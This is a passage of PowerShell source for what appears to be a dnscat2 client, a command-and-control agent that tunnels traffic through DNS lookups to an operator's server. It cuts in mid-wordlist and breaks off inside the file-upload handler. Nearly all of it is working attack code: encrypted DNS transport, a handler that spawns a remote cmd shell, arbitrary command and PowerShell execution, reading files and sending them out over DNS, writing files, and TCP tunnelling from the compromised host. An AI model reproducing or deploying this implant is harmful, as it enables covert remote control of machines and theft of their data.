ierce','Pigs','Pikey','Pitch','Plato','Plays','Plight','Poetic','Poker','Polite','Pontic','Pony','Powers','Poxes','Prams','Pulped','Purr','Push','Quint','Random','Rapier','Ravel','Real','Rebolt','Recoil','Redear','Reink','Ripe','Riprap','Roger','Ropers','Roving','Rumor','Sanded','Sawlog','Sawman','Scribe','Scruff','Seitan','Sense','Shirks','Sippy','Sitcom','Slumpy','Softy','Sonar','Sonny','Sophic','Spear','Spiced','Spikey','Spine','Spoofy','Spring','Static','Staved','Stilt','Stinty','Stirs','Storer','Story','Strode','Stump','Suited','Surfs','Swatch','Swum','Tables','Taking','Tattoo','Teal','Teeth','Telco','Timer','Tins','Tonite','Tore','Tort','Tried','Trivia','Tubule','Tusked','Twins','Twos','Unborn','Undam','Unwrap','Upcurl','Upseal','Visas','Volume','Waded','Wages','Ware','Wears','Wicked','Winful','Wisely','Wisp','Yerba','Zester','Zoner','Zootic') return (Get-SHA3 ([System.Text.Encoding]::ASCII.GetBytes("authstring") + $SharedSecret + $ClientPublicKey + $ServerPublicKey))[0..5] | % { $Wordlist[$_] } } function New-RandomDNSField ($Length) { return [string]((1..$Length | % { 0,1,2,3,4,5,6,7,8,9,'A','B','C','D','E','F' | Get-Random }) -join "") } function Update-Dnscat2ACK ($Data, $AcknowledgementNumber) { return ([string]("{0:x}" -f (([int]("0x" + $AcknowledgementNumber) + $Data.Length/2) % 65535))).PadLeft(4,"0") } function Compare-SequenceNumber ($SequenceNumber, $AcknowledgementNumber) { $SequenceNumber = [uint16]("0x" + $SequenceNumber) $AcknowledgementNumber = [uint16]("0x" + $AcknowledgementNumber) if ($AcknowledgementNumber -lt $SequenceNumber) { # ACK recently rolled over return ($AcknowledgementNumber + 65535 - $SequenceNumber) } else { return ($AcknowledgementNumber - $SequenceNumber) } } function Get-NextDnscat2Data ($DataQueue, $MaxMSGDataSize) { if ($DataQueue.Length -eq 0) { return "" } $Data = "" $PacketCount = 0 if ($MaxMSGDataSize % 2 -eq 1) { $MaxMSGDataSize -= 1 } foreach ($Char in $DataQueue.ToCharArray()) { if ($PacketCount -ge ($MaxMSGDataSize - 12)) { return $Data } $Data += $Char $PacketCount += 1 } if ($Data.Length % 2 -eq 1) { $Data.Substring(0, $Data.Length - 1) } return $Data } function Add-DNSDots ($Data) { $SectionCount = 0 # Tracks the chars in each section between dots $Packet = "" foreach ($Char in $Data.ToCharArray()) { if ($SectionCount -ge 63) { $SectionCount = 0 $Packet += "." } $Packet += $Char $SectionCount += 1 } return $Packet.TrimEnd(".") } function New-Dnscat2SYN ($Domain, $SessionId, $SequenceNumber, $Options) { return ((New-RandomDNSField 4) + "00" + $SessionId + $SequenceNumber + $Options) } function New-Dnscat2MSG ($Domain, $SessionId, $SequenceNumber, $AcknowledgementNumber, $Data) { return ((New-RandomDNSField 4) + "01" + $SessionId + $SequenceNumber + $AcknowledgementNumber + $Data) } function New-Dnscat2FIN ($Domain, $SessionId) { return ((New-RandomDNSField 4) + "02" + $SessionId + "00") } function New-Dnscat2ENC ($Domain, $SessionId, $Subtype, $Flags, $Key) { return ((New-RandomDNSField 4) + "03" + $SessionId + $Subtype + $Flags + $Key) } function ConvertTo-EncryptedDnscat2Packet ($Packet, $EncryptionKeys) { [string]$Packet = $Packet $PaddedNonce = [System.BitConverter]::GetBytes([uint64]$EncryptionKeys["nonce"]) [array]::Reverse($PaddedNonce) $PacketHeader = Convert-HexToBytes $Packet.Substring(0,10) [byte[]]$PacketBody = @() if ($Packet.Length -gt 10) { $PacketBody = Convert-HexToBytes $Packet.Substring(10) } $EncryptedPacketBody = Convert-Salsa20 $PacketBody $EncryptionKeys["client_write"] $PaddedNonce $Signature = Get-Dnscat2PacketSignature $EncryptionKeys["client_mac"] $PacketHeader $PaddedNonce[6..7] $EncryptedPacketBody $EncryptedPacket = $Packet.Substring(0,10) + (Convert-BytesToHex $Signature) + ([Convert]::ToString($EncryptionKeys["nonce"], 16)).PadLeft(4, '0') + (Convert-BytesToHex $EncryptedPacketBody) return $EncryptedPacket } function ConvertFrom-EncryptedDnscat2Packet ($Packet, $EncryptionKeys) { $PacketHeader = ($Packet[0..9] -join "") $Signature = Convert-HexToBytes ($Packet[10..21] -join "") $Nonce = (Convert-HexToBytes ($Packet[22..25] -join "")) $PaddedNonce = (Convert-HexToBytes (($Packet[22..25] -join "").PadLeft(16, '0'))) $EncryptedPacketData = (Convert-HexToBytes ($Packet[26..$Packet.Length] -join "")) $PacketData = Convert-Salsa20 $EncryptedPacketData $EncryptionKeys["server_write"] $PaddedNonce $CorrectSignature = Get-Dnscat2PacketSignature $EncryptionKeys["server_mac"] (Convert-HexToBytes $PacketHeader) $Nonce $EncryptedPacketData if ((Convert-BytesToHex $CorrectSignature) -ne (Convert-BytesToHex $Signature)) { Write-Verbose ("SIGNATURE MISMATCH: Packet " + ($Packet[0..3] -join '')) } return ($PacketHeader + (Convert-BytesToHex $PacketData)) } function Send-Dnscat2Packet ($Packet, $Domain, $DNSServer, $DNSPort, $LookupTypes, $Encryption, $EncryptionKeys) { if ($Encryption) { $Packet = ConvertTo-EncryptedDnscat2Packet $Packet $EncryptionKeys } if ($LookupTypes.Count -gt 0) { $LookupType = $LookupTypes | Get-Random } else { $LookupType = $LookupTypes[0] } $Packet = Add-DNSDots $Packet $Packet += ("." + $Domain) $Command = ("set type=$LookupType`nserver $DNSServer`nset port=$DNSPort`nset retry=1`n" + $Packet + "`nexit") $result = ($Command | nslookup 2>&1 | Out-String) $Done = $False if ($LookupType -eq "TXT") { if ($result.Contains('"')) { $Done = $True $result = ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value) } } elseif ($LookupType -eq "MX") { if ($result.Contains('mail')) { $Done = $True $result = ([string](($result[($result.IndexOf("mail exchanger = ") + 17)..$result.Length] -join '').split("`n")[0])).replace($Domain,"").replace(".","").replace("`n","").replace(" ","").Trim() } } elseif ($LookupType -eq "CNAME") { if ($result.Contains('canonical')) { $Done = $True $result = ([string](($result[($result.IndexOf("canonical name =") + 17)..$result.Length] -join '').split("`n")[0])).replace($Domain,"").replace(".","").replace("`n","").replace(" ","").Trim() } } elseif ($LookupType -eq "A") { if ($result.Contains('Name')) { $Done = $True [byte[]]$Data = @() # Extract and sort the IPs $regex = [regex] "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" $IPs = ($regex.Matches($result.Substring($result.IndexOf("Name"))) | %{ $_.value }) | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split('.'))} # First response is different, it has a length field $PacketLength = [Convert]::ToUInt16($IPs[0].split(".")[1]) $IPs[0].split(".")[2..3] | % { $Data += [Convert]::ToUInt16($_) } $IPs = $IPs[1..$IPs.Count] # Strip the sequence numbers out of the other packets if ($IPs.Count -gt 0) { foreach ($IP in $IPs) { $IP.split(".")[1..3] | % { $Data += [Convert]::ToUInt16($_) } } } # Return result as hex and strip out the padding $result = Convert-BytesToHex $Data[0..($PacketLength - 1)] } } elseif ($LookupType -eq "AAAA") { if ($result.Contains('Name')) { $Done = $True $Data = "" # Extract the IPs $regex = [regex] "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))" $IPs = @() $IPs += ($regex.Matches($result.Substring($result.IndexOf("Name"))) | % { if ($_.value -ne "::") {$_.value} } ) # Expand the IPv6 address for ($i = 0; $i -lt $IPs.Count; $i++) { [byte[]]$ipbytes = ([Net.IPAddress]$IPs[$i]).GetAddressBytes(); $bldr = New-Object System.Text.StringBuilder for ($b =0; $b -lt 16; $b += 2) { $bldr.AppendFormat("{0:x2}{1:x2}:", $ipbytes[$b], $ipbytes[$b+1]) | Out-Null } $bldr.Length = $bldr.Length-1 $IPs[$i] = $bldr.ToString() } # Sort $IPs = $IPs | sort # First response is different, it has a length field $PacketLength = [Convert]::ToUInt16($IPs[0].Substring(2,2),16) $Data += $IPs[0].replace(":","").Substring(4) # Strip length and seq from start # Grab data from responses after the first $IPs = $IPs[1..$IPs.Count] if ($IPs.Count -gt 0) { foreach ($IP in $IPs) { $Data += $IP.replace(":","").Substring(2) # Strip seq from start } } # Return result as hex and strip out the padding $result = $Data.Substring(0, $PacketLength*2) } } if ($Done) { if ($Encryption) { $DecryptedPacket = [string](ConvertFrom-EncryptedDnscat2Packet $result $EncryptionKeys) return $DecryptedPacket } return $result } return 1 } function ConvertTo-Dnscat2Packet ($RawPacket) { if ((($RawPacket.Length)%2 -eq 1) -or ($RawPacket.Length -eq 0)) { return 1 } $Packet = New-Object System.Collections.Hashtable $Packet["PacketId"] = ($RawPacket[0..3] -join "") $Packet["MessageType"] = ($RawPacket[4..5] -join "") $Packet["SessionId"] = ($RawPacket[6..9] -join "") $Packet["Data"] = "" $Data = "" switch ($Packet["MessageType"]) { "00" { $Packet["SequenceNumber"] = ($RawPacket[10..13] -join "") $Packet["AcknowledgementNumber"] = ($RawPacket[10..13] -join "") $Packet["Options"] = ($RawPacket[14..17] -join "") if ($Packet["Options"] -eq 1) { # Name $Packet["Name"] = ($RawPacket[18..$RawPacket.Length] -join "") } elseif ($Packet["Options"] -eq 32) { # Command } } "01" { $Packet["SequenceNumber"] = ($RawPacket[10..13] -join "") $Packet["AcknowledgementNumber"] = ($RawPacket[14..17] -join "") if ($RawPacket.Length -gt 18) { $Packet["Data"] = ($RawPacket[18..$RawPacket.Length] -join "") } else { $Packet["Data"] = "" } } "02" { $Packet["Reason"] = ($RawPacket[10..$RawPacket.Length] -join "") } "03" { $Packet["Subtype"] = ($RawPacket[10..13] -join "") $Packet["Flags"] = ($RawPacket[14..17] -join "") $Keys = ($RawPacket[18..$RawPacket.Length] -join "") if ($Subtype -eq "0000") { # ENC_SUBTYPE_INIT $Packet["server_pubkey_x"] += [Convert]::ToString($Keys[0..63] -join "") $Packet["server_pubkey_y"] += [Convert]::ToString($Keys[64..$Keys.Length] -join "") Write-Verbose ("server_pubkey_x: " + $Packet["server_pubkey_x"]) Write-Verbose ("server_pubkey_y: " + $Packet["server_pubkey_y"]) } else { # ENC_SUBTYPE_INIT $Packet["authenticator"] = $Keys } } } return $Packet } function Start-Dnscat2EncInit ($Session, $Renegotiate) { if ($Renegotiate) { $OldEncryptionKeys = $Session["EncryptionKeys"] } $ECKeyPairGenerator = New-Object Org.BouncyCastle.Crypto.Generators.ECKeyPairGenerator $ECKeyPairGenerator.Init((New-Object Org.BouncyCastle.Crypto.KeyGenerationParameters((New-Object Org.BouncyCastle.Security.SecureRandom), 256))) $ECKeyPair = $ECKeyPairGenerator.GenerateKeyPair() $Session["EncryptionKeys"]["keypair"] = $ECKeyPair $Session["EncryptionKeys"]["client_privkey"] = (Convert-BytesToHex $ECKeyPair.Private.D.ToByteArrayUnsigned()) $Session["EncryptionKeys"]["client_pubkey"] = (Convert-BytesToHex $ECKeyPair.Public.Q.X.ToBigInteger().ToByteArrayUnsigned()) + (Convert-BytesToHex $ECKeyPair.Public.Q.Y.ToBigInteger().ToByteArrayUnsigned()) $Session["EncryptionKeys"]["client_pubkey_x"] = (Convert-BytesToHex $ECKeyPair.Public.Q.X.ToBigInteger().ToByteArrayUnsigned()) $Session["EncryptionKeys"]["client_pubkey_y"] = (Convert-BytesToHex $ECKeyPair.Public.Q.Y.ToBigInteger().ToByteArrayUnsigned()) $Subtype = "0000" # ENC_SUBTYPE_INIT $Flags = "0000" Write-Verbose ("client_pubkey: " + ($Session["EncryptionKeys"]["client_pubkey"])) $EncPacket = (New-Dnscat2ENC $Session["Domain"] $Session["SessionId"] $Subtype $Flags $Session["EncryptionKeys"]["client_pubkey"] $Session["MaxMSGDataSize"]) try { $Packet = 1 # If we are renegotiating, encrypt the packet $Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $EncPacket $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $Renegotiate $OldEncryptionKeys) } catch {} if ($Packet -eq 1) { Write-Error "Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly." return 1 } $Session["EncryptionKeys"]["server_pubkey_x"] = $Packet["server_pubkey_x"] $Session["EncryptionKeys"]["server_pubkey_y"] = $Packet["server_pubkey_y"] $Session["EncryptionKeys"]["server_pubkey"] = ($Session["EncryptionKeys"]["server_pubkey_x"] + $Session["EncryptionKeys"]["server_pubkey_y"]) [uint16]$Session["EncryptionKeys"]["nonce"] = 0 $Session["EncryptionKeys"]["shared_secret"] = Get-SharedSecret $Session["EncryptionKeys"]["client_privkey"] $Session["EncryptionKeys"]["server_pubkey_x"] $Session["EncryptionKeys"]["server_pubkey_y"] $Session["EncryptionKeys"]["client_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("client")) + $Session["EncryptionKeys"]["shared_secret"] + (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) + (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) + ([System.Text.Encoding]::ASCII.GetBytes($Session["EncryptionKeys"]["PreSharedSecret"]))) $Session["EncryptionKeys"]["server_auth"] = Get-SHA3 (([System.Text.Encoding]::ASCII.GetBytes("server")) + $Session["EncryptionKeys"]["shared_secret"] + (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) + (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) + ([System.Text.Encoding]::ASCII.GetBytes($Session["EncryptionKeys"]["PreSharedSecret"]))) $Session["EncryptionKeys"]["sas"] = Get-Dnscat2ShortAuthString $Session["EncryptionKeys"]["shared_secret"] (Convert-HexToBytes $Session["EncryptionKeys"]["client_pubkey"]) (Convert-HexToBytes $Session["EncryptionKeys"]["server_pubkey"]) $Session["EncryptionKeys"]["client_write"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_write_key"))) $Session["EncryptionKeys"]["client_mac"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("client_mac_key"))) $Session["EncryptionKeys"]["server_write"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_write_key"))) $Session["EncryptionKeys"]["server_mac"] = Get-SHA3 ($Session["EncryptionKeys"]["shared_secret"] + ([System.Text.Encoding]::ASCII.GetBytes("server_mac_key"))) $Session["Negotiated"] = $True return $Session } function Start-Dnscat2EncAuth ($Session) { $Subtype = "0001" # ENC_SUBTYPE_AUTH $Flags = "0001" $EncPacket = (New-Dnscat2ENC $Session["Domain"] $Session["SessionId"] $Subtype $Flags (Get-NextDnscat2Data (Convert-BytesToHex $Session["EncryptionKeys"]["client_auth"]) $Session["MaxMSGDataSize"])) try { $Packet = 1 $Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $EncPacket $Session["Domain"] $Session["DNSServer"] $Session["DNSPort"] $Session["LookupTypes"] $False $null) } catch { } if ($Packet -eq 1) { Write-Error "Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly." return 1 } if ($Packet["authenticator"] -eq (Convert-BytesToHex $Session["EncryptionKeys"]["server_auth"])) { Write-Verbose "SESSION AUTHENTICATED" } else { Write-Error "MITM WARNING: Server responded with an incorrect PreSharedSecret!" return 1 } return $Session } function Start-Dnscat2Session ($SessionId, $Options, $Domain, $DNSServer, $DNSPort, $MaxPacketSize, $Encryption, $PreSharedSecret, $LookupTypes, $Delay, $MaxRandomDelay, $Driver, $DriverOptions) { $Session = New-Object System.Collections.Hashtable $Session["SessionId"] = $SessionId $Session["Domain"] = $Domain $Session["DNSServer"] = $DNSServer $Session["DNSPort"] = $DNSPort $Session["SequenceNumber"] = (New-RandomDNSField 4) $Session["MaxPacketSize"] = $MaxPacketSize $Session["MaxMSGDataSize"] = $MaxPacketSize - $Domain.Length - 18 $Session["Driver"] = $Driver $Session["Dead"] = $False $Session["NewSessions"] = New-Object System.Collections.Hashtable $Session["Delay"] = $Delay $Session["MaxRandomDelay"] = $MaxRandomDelay $Session["LookupTypes"] = $LookupTypes $Session["SYNOptions"] = $Options $Session["PSCommandReady"] = $False $Session["PSCommand"] = "" $Session["PSUploadReady"] = $False $Session["PSUploadName"] = "" $Session["PSUploadValue"] = $null $Session["PSDownloadReady"] = $False $Session["PSDownloadPacketIdBF"] = "" $Session["PSDownloadName"] = "" $Session["Encryption"] = $Encryption $Session["Negotiated"] = $False $Session["EncryptionKeys"] = New-Object System.Collections.Hashtable $Session["EncryptionKeys"]["PreSharedSecret"] = $PreSharedSecret if ($Encryption) { $Session = Start-Dnscat2EncInit $Session $False if ($Session -eq 1) { return 1 } if ($PreSharedSecret -ne "") { $Session = Start-Dnscat2EncAuth $Session if ($Session -eq 1) { return 1 } } } $SYNPacket = (New-Dnscat2SYN $Domain $SessionId $Session["SequenceNumber"] $Options) $Packet = ConvertTo-Dnscat2Packet (Send-Dnscat2Packet $SYNPacket $Domain $DNSServer $DNSPort $LookupTypes $Session["Encryption"] $Session["EncryptionKeys"]) if ($Packet -eq 1) { Write-Error "Failed to start session. Ensure your dnscat2 server is set up correctly." return 1 } $Session["DriverDataQueue"] = $Packet["Data"] $Session["AcknowledgementNumber"] = $Packet["AcknowledgementNumber"] if($Driver -eq "console") { } elseif ($Driver -eq "command") { $Session["RemainingBytes"] = 0 $Session["PacketId"] = "" $Session["PacketIdBF"] = "" $Session["IsResponse"] = "" $Session["CommandId"] = "" $Session["CommandFields"] = "" $Session["CommandPacketBuffer"] = "" $Session["Tunnels"] = New-Object System.Collections.Hashtable $Session["DeadTunnels"] = @() } elseif ($Driver -eq "exec") { $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo $ProcessStartInfo.FileName = $DriverOptions $ProcessStartInfo.UseShellExecute = $False $ProcessStartInfo.RedirectStandardInput = $True $ProcessStartInfo.RedirectStandardOutput = $True $ProcessStartInfo.RedirectStandardError = $True $Process = [System.Diagnostics.Process]::Start($ProcessStartInfo) $Process.Start() | Out-Null $StdOutDestinationBuffer = New-Object System.Byte[] 65536 $StdOutReadOperation = $Process.StandardOutput.BaseStream.BeginRead($StdOutDestinationBuffer, 0, 65536, $null, $null) $StdErrDestinationBuffer = New-Object System.Byte[] 65536 $StdErrReadOperation = $Process.StandardError.BaseStream.BeginRead($StdErrDestinationBuffer, 0, 65536, $null, $null) $Session["Process"] = $Process $Session["ProcessId"] = $Process.Id $Session["StdOutReadOperation"] = $StdOutReadOperation $Session["StdOutDestinationBuffer"] = $StdOutDestinationBuffer $Session["StdErrReadOperation"] = $StdErrReadOperation $Session["StdErrDestinationBuffer"] = $StdErrDestinationBuffer } if ($Session["MaxMSGDataSize"] -le 0) { Write-Error "Domain name is too long." return 1 } return $Session } function New-Dnscat2Tunnel ($Session, $TunnelId) { $Socket = New-Object System.Net.Sockets.TcpClient $Handle = $Socket.BeginConnect($Session["Tunnels"][$TunnelId].Host,$Session["Tunnels"][$TunnelId].Port,$null,$null) $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while ($True) { if($Handle.IsCompleted) { try { $Socket.EndConnect($Handle) $Stream = $Socket.GetStream() $BufferSize = $Socket.ReceiveBufferSize break } catch { $Socket.Close() $Stopwatch.Stop() $Session["Tunnels"][$TunnelId].Add("Dead", $True) return $Session } } if($Stopwatch.Elapsed.TotalSeconds -gt 10) { $Socket.Close() $Stopwatch.Stop() $Session["Tunnels"][$TunnelId].Add("Dead", $True) return $Session } Sleep -Milliseconds 100 } $Session["Tunnels"][$TunnelId].Add("Stream", $Stream) $Session["Tunnels"][$TunnelId].Add("Socket", $Socket) $Session["Tunnels"][$TunnelId].Add("BufferSize", $BufferSize) $Session["Tunnels"][$TunnelId].Add("StreamDestinationBuffer", (New-Object System.Byte[] $Session["Tunnels"][$TunnelId]["BufferSize"])) $Session["Tunnels"][$TunnelId].Add("StreamReadOperation", $Session["Tunnels"][$TunnelId]["Stream"].BeginRead($Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"], 0, $Session["Tunnels"][$TunnelId]["BufferSize"], $null, $null)) $Session["Tunnels"][$TunnelId].Add("StreamBytesRead", 1) $Session["Tunnels"][$TunnelId].Add("Dead", $False) return $Session } function Read-FromDnscat2Tunnel ($Session, $TunnelId) { if ($Session["Tunnels"][$TunnelId]["StreamBytesRead"] -eq 0) { $Session["Tunnels"][$TunnelId].Dead = $True; return $Session } if ($Session["Tunnels"][$TunnelId]["StreamReadOperation"].IsCompleted) { $Session["Tunnels"][$TunnelId]["StreamBytesRead"] = $Session["Tunnels"][$TunnelId]["Stream"].EndRead($Session["Tunnels"][$TunnelId]["StreamReadOperation"]) if($Session["Tunnels"][$TunnelId]["StreamBytesRead"] -eq 0){ $Session["Tunnels"][$TunnelId].Dead = $True; return $Session } $Data = $Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"][0..([int]($Session["Tunnels"][$TunnelId]["StreamBytesRead"])-1)] $Session["Tunnels"][$TunnelId]["StreamReadOperation"] = $Session["Tunnels"][$TunnelId]["Stream"].BeginRead($Session["Tunnels"][$TunnelId]["StreamDestinationBuffer"], 0, $Session["Tunnels"][$TunnelId]["BufferSize"], $null, $null) # Queue tunnel packets $Data = Convert-BytesToHex $Data $PacketId = (New-RandomDNSField 4) $PacketId = ([Convert]::ToString(([convert]::ToUInt16($PacketId, 16) -band ( -bnot [uint16]([Math]::Floor(1 * [Math]::Pow(2,15))))),16)).PadLeft(4, '0') $PacketLengthField = ([Convert]::ToString(($PacketId.Length/2 + 2 + $TunnelId.Length/2 + $Data.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $PacketId + "1001" + $TunnelId + $Data) $Session["DriverDataQueue"] += $DriverData } return $Session } function Send-ToDnscat2Tunnel ($Session, $TunnelId, $Data) { try { [byte[]]$Bytes = Convert-HexToBytes $Data $Session["Tunnels"][$TunnelId]["Stream"].Write($Bytes, 0, $Bytes.Length) } catch { $Session["Tunnels"][$TunnelId].Dead = $True } return $Session } function Close-Dnscat2Tunnel ($Session, $TunnelId) { try { $Session["Tunnels"][$TunnelId].Dead = $True } catch { } try { $Session["Tunnels"][$TunnelId]["Stream"].Close() } catch { } try { $Session["Tunnels"][$TunnelId]["Socket"].Close() } catch { } return $Session } function Update-Dnscat2CommandSession ($Session) { if ($Session["CommandPacketBuffer"].Length -le 0) { return $Session } ## PROCESS COMMAND PACKETS while ($Session["CommandPacketBuffer"].Length -gt 0) { # Packet Header if (($Session["RemainingBytes"] -eq 0) -and ($Session["CommandPacketBuffer"].Length -ge 16)) { # Decode Command Packet Header $Session["Length"] = [Convert]::ToUInt32($Session["CommandPacketBuffer"][0..7] -join '', 16) $Session["PacketId"] = $Session["CommandPacketBuffer"][8..11] -join '' $Session["PacketIdBF"] = [Convert]::ToString(([convert]::ToUInt16($Session["CommandPacketBuffer"][8..11] -join '', 16) -bxor ([Math]::Floor(1 * [Math]::Pow(2,15)))),16) $Session["CommandId"] = $Session["CommandPacketBuffer"][12..15] -join '' $Session["RemainingBytes"] = ($Session["Length"] - 4) $Session["CommandPacketBuffer"] = $Session["CommandPacketBuffer"].Substring(16) $Session["CommandFields"] = "" } elseif ($Session["RemainingBytes"] -gt 0) { # Packet Data if ($Session.RemainingBytes*2 -ge $Session["CommandPacketBuffer"].Length) { # length of remaining command packet is -ge remaining data buffer # We can just grab the rest of the packet buffer $Session["CommandFields"] += $Session["CommandPacketBuffer"] $Session["RemainingBytes"] -= $Session["CommandPacketBuffer"].Length/2 $Session["CommandPacketBuffer"] = "" } else { # length of remaining command packet is -lt remaining data buffer # We have another packet header in the buffer! $Session["CommandFields"] += $Session["CommandPacketBuffer"].Substring(0, $Session.RemainingBytes*2) $RemainingBytes = $Session.RemainingBytes*2 $Session["RemainingBytes"] -= ($Session["CommandPacketBuffer"].Substring(0, $Session.RemainingBytes*2)).Length/2 $Session["CommandPacketBuffer"] = $Session["CommandPacketBuffer"].Substring($RemainingBytes) } if ($Session["RemainingBytes"] -eq 0) { # If we've completed a packet, lets send it right now break } } else { # Happens when a piece of a packet header remains in the buffer # We should wait until the whole header is in the buffer before processing break } } ## INVOKE COMMAND PACKET if ($Session["RemainingBytes"] -eq 0) { switch ($Session["CommandId"]) { "0000" # COMMAND_PING { $PacketLengthField = ([Convert]::ToString((4 + $Session.CommandFields.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "0000" + $Session.CommandFields) $Session["DriverDataQueue"] += $DriverData return $Session } "0001" # COMMAND_SHELL { try { $NewSessionName = $Session.CommandFields $NewSession = Start-Dnscat2Session (New-RandomDNSField 4) ("0001" + $NewSessionName) $Session.Domain $Session.DNSServer $Session.DNSPort $Session.MaxPacketSize $Session.Encryption $Session["EncryptionKeys"].PreSharedSecret $Session.LookupTypes $Session.Delay $Session.MaxRandomDelay "exec" "cmd" $Session.NewSessions.Add($NewSession.SessionId, $NewSession) $PacketLengthField = ([Convert]::ToString((4 + $NewSession.SessionId.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "0001" + $NewSession.SessionId) $Session["DriverDataQueue"] += $DriverData } catch { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "COMMAND_SHELL Failed!") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) $Session["DriverDataQueue"] += $DriverData } return $Session } "0002" # COMMAND_EXEC { try { $NewSessionName = $Session.CommandFields.Substring(0,$Session.CommandFields.IndexOf("00")) $NewSessionCommand = Convert-HexToString ($Session.CommandFields.Substring($Session.CommandFields.IndexOf("00") + 2).replace("00","")) $NewSessionDriver = "exec" if ($NewSessionCommand -eq "psh") { $NewSessionDriver = "PS" $NewSessionCommand = "" } $NewSession = Start-Dnscat2Session (New-RandomDNSField 4) ("0001" + $NewSessionName + '00') $Session.Domain $Session.DNSServer $Session.DNSPort $Session.MaxPacketSize $Session.Encryption $Session["EncryptionKeys"].PreSharedSecret $Session.LookupTypes $Session.Delay $Session.MaxRandomDelay $NewSessionDriver $NewSessionCommand $Session.NewSessions.Add($NewSession.SessionId, $NewSession) $PacketLengthField = ([Convert]::ToString((4 + $NewSession.SessionId.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "0002" + $NewSession.SessionId) $Session["DriverDataQueue"] += $DriverData } catch { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "COMMAND_EXEC Failed!") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) $Session["DriverDataQueue"] += $DriverData } return $Session } "0003" # COMMAND_DOWNLOAD { try { $FileName = Convert-HexToString $Session.CommandFields.TrimEnd('00') if ($FileName.StartsWith("bytes:`$")) { $Session["PSDownloadReady"] = $True $Session["PSDownloadName"] = $FileName.Substring(7) $Session["PSDownloadPacketIdBF"] = $Session.PacketIdBF } else { $FileHexDump = Convert-BytesToHex ([IO.File]::ReadAllBytes($FileName)) $PacketLengthField = ([Convert]::ToString((4 + ($FileHexDump.Length/2)),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "0003" + $FileHexDump) $Session["DriverDataQueue"] += $DriverData } } catch { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "Could not read file. Make sure to provide the full path!") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + $Reason) $Session["DriverDataQueue"] += $DriverData } } "0004" # COMMAND_UPLOAD { try { $Data = $Session['CommandFields'] $FileName = Convert-HexToString ($Data[0..($Data.IndexOf('00') - 1)] -join '') [String]$Data = (($Data[($Data.IndexOf('00') + 2)..$Data.Length]) -join '') if ($FileName.StartsWith("hex:`$")) { $Session["PSUploadReady"] = $True $Session["PSUploadName"] = $FileName.Substring(5) $Session["PSUploadValue"] = $Data } else { [byte[]]$Bytes = Convert-HexToBytes $Data [IO.File]::WriteAllBytes($FileName, $Bytes) 2>&1 | Out-Null } } catch { $ErrorCode = $CommandId $Reason = (Convert-StringToHex "Could not write file") + "00" $PacketLengthField = ([Convert]::ToString((4 + 2 + $Reason.Length/2),16)).PadLeft(8, '0') $DriverData = ($PacketLengthField + $Session.PacketIdBF + "FFFF" + $ErrorCode + 